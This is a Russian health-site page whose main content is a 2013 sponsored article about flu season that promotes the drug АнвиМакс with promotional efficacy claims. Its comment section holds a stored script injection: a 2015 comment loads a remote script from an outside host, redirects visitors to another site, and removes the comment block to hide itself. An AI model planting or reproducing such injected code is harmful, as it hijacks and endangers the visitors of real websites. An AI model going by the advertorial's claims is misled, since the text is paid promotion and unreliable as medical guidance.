Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Грипп – это серьезно  >>  Грипп – это серьезно
 
Обратная связь
 

Грипп – это серьезно

Размер шрифта
04 февраля 2013 00:00
  • google_analytics: false
  • Нравится

Февраль – месяц традиционного повышения заболеваемости ОРВИ и гриппом.

грипп - это серьезно

Этот рост связан с возвращением после новогодних каникул детей и подростков в детские сады и школы, взрослых – в трудовые коллективы, «привозом» вирусной инфекции из-за границы (особенно из азиатских стран), где многие предпочитают проводить зимний отпуск.  Заболевший гриппом человек становится заразным для окружающих за несколько суток или часов до активного начала болезни, то есть он выглядит как здоровый, но уже активно распространяет вирусы в окружающую среду. Это тоже способствует распространению гриппа и ОРВИ в коллективах и местах скопления людей.

Несмотря на огромное количество доступной информации о вирусных респираторных заболеваниях, многие до сих пор достаточно беспечно относятся к этой проблеме и считают, что температура и насморк – не помеха для продолжения активной жизни. Особенно, если выпить на ночь комбинированное средство, которое купирует неприятные симптомы, то утром уже можно идти на работу.

Такое отношение приводит к развитию осложнений, ведь обычные комбинированные средства содержат только жаропонижающие и антиаллергические компоненты, которые снимают остроту симптомов, но не действуют на основную причину заболевания – вирус. Поэтому организм продолжает болеть, но только в смазанной, замаскированной форме. А при наличии дополнительной нагрузки в виде работы, занятий спортом в какой-то момент «сдает», и это приводит к развитию осложнений. Наиболее распространенными среди них являются заболевания сердечно-сосудистой и бронхо-легочной систем, страдают и другие жизненно-важные функции.

Последнее время врачи отмечают тенденцию одновременной циркуляции среди населения нескольких  разных типов респираторных вирусов. Это особенно опасно, так как иммунитет к одному типу вирусов не обеспечивает иммунитет к другому. В результате, можно последовательно переболеть несколькими респираторными заболеваниями, особенно если неправильно лечиться во время заболевания.

Вирус гриппа, попавший в организм человека, проявляет себя следующими симптомами:

  • повышение температуры тела, иногда до 39-40 градусов;
  • воспаление слизистой оболочки верхних дыхательных путей и, как следствие, насморк, кашель и боль в горле;
  • вялость, слабость;
  • головная и мышечная боли.

При первых же симптомах необходимо начинать адекватное и эффективное лечение, которое возможно лишь в случае, если лекарственное средство борется не только с симптомами, но и с основной причиной заболевания – с вирусной инфекцией.

Среди большого количества комбинированных средств от простуды и гриппа таким свойством –  бороться с вирусом – обладает единственный препарат АнвиМакс. В его состав входит компонент римантадин, противовирусное действие которого доказано во многих клинических исследованиях. Он блокирует размножение вируса, поэтому при лечении гриппа и простуды выздоровление наступает быстрее, а риск возникновения осложнений минимален.

При лечении гриппа препаратом АнвиМакс:

  • температура нормализуется на 3-й день;
  • насморк и отек слизистой исчезают к 5-ому дню;
  • кашель и боль в горле также исчезают к 5-ому дню терапии.

В состав препарата также входят компоненты симптоматического действия – парацетамол (жаропонижающий, анальгетический эффект) и лоратадин (антиаллергическое действие), и компоненты для защиты стенки сосудов и для общего укрепления организма – рутозид (уменьшает ломкость и проницаемость капилляров); глюконат кальция (улучшает капиллярное кровообращение); витамин С (укрепляет защитные силы организма, обладает антиоксидантным эффектом).

Многие наверняка уже встречались с препаратом АнвиМакс под его старым названием Антигриппин-Максимум и хорошо знают его эффективность и безопасность. В препарате АнвиМакс сохранены все характеристики Антигриппина-Максимум: состав, технология производства, поменялось только название. Перед применением препарата необходимо проконсультироваться с врачом.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Победа над гриппом   Разрушители иммунитета. Что лишает вас защиты от болезней   Как не заболеть зимой. Перезимуем без таблеток!   Болезни-близнецы. Как не ошибиться в лечении кашля  
05 февраля 2013Почему мы болеем гриппом зимой 06 августа 2012Вирус птичьего гриппа не дремлет!
 
11 июля 2012Вирус простуды убивает раковые клетки! 04 июля 2012Оказывается, если вы грамотно лечите грипп, то вы защищаете себя от рака кожи
 

Слайдшоу

1
Термометр i-Temp mini
Термометр Flex Temp
Как избавиться от больного горла?

Тесты

1
Заболеет ли ваша семья?
Грипп или простуда?
Почему болит горло?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.